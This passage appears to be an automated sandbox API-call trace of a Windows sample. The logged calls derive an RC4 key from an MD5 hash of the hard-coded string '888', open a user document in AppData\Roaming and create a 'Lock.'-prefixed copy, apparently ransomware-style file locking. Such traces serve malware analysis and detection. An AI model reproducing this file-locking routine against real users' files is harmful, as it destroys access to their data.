wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.901] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.901] CryptCreateHash (in: hProv=0x9be890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0122.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.901] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0122.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.902] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa348, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.902] CryptHashData (hHash=0x9a42c0, pbData=0x2a71c58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0122.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.902] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.902] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa2e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.903] CryptDeriveKey (in: hProv=0x9be890, Algid=0x6601, hBaseData=0x9a42c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a47c0) returned 1 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.903] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.903] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.903] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.903] CryptDestroyHash (hHash=0x9a42c0) returned 1 [0122.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.904] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.904] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.904] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/lNMKqFE.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lnmkqfe.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0122.904] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.904] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0122.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0122.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0122.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0122.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.906] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0122.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0122.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0122.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0122.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0122.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.lNMKqFE.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.lnmkqfe.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0122.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0122.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0122.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0122.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd2020 [0122.917] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0122.917] ReadFile (in: hFile=0x4f4, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x5974, lpOverlapped=0x0) returned 1 [0122.918] ReadFile (in: hFile=0x4f4, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0122.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5974) returned 0x37d0050 [0122.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd2020 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 